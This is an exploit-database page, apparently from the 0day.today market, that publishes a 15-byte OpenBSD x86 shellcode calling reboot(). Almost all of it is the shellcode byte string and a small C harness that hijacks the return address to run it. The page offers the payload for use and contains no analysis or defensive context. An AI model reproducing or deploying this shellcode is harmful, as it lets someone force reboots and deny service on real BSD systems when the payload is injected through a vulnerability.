[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

bsd/x86 reboot() shellcode 15 bytes

Author
beosroot
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-11919
Category
shellcode
Date add
22-04-2010
Platform
bsd/x86
===================================
bsd/x86 reboot() shellcode 15 bytes
===================================

# Exploit Title: [bsd/x86 reboot() shellcode 15 bytes]     
-::OpenBSD reboot() shellcode
# Date: [21-04-2010]         
# Author:   -::beosroot
# Software Link: [downoad link if available]
# Version: [OpenBSD/x86]
# Platform / Tested on: [BSD]  -::OpenBSD
# category: [shellcode]
# Code : [
//bsd/x86 reboot() shellcode


//by beosroot


char shellcode[] =
        "\x31\xc0\x66\xba\x0e\x27\x66\x81\xea\x06\x27\xb0\x37\xcd\x80";

int main() {

  int *ret = (int *)&ret + 2;
  (*ret) = (int)shellcode;
}


// the end o.O
]



#  0day.today [2024-09-28]  #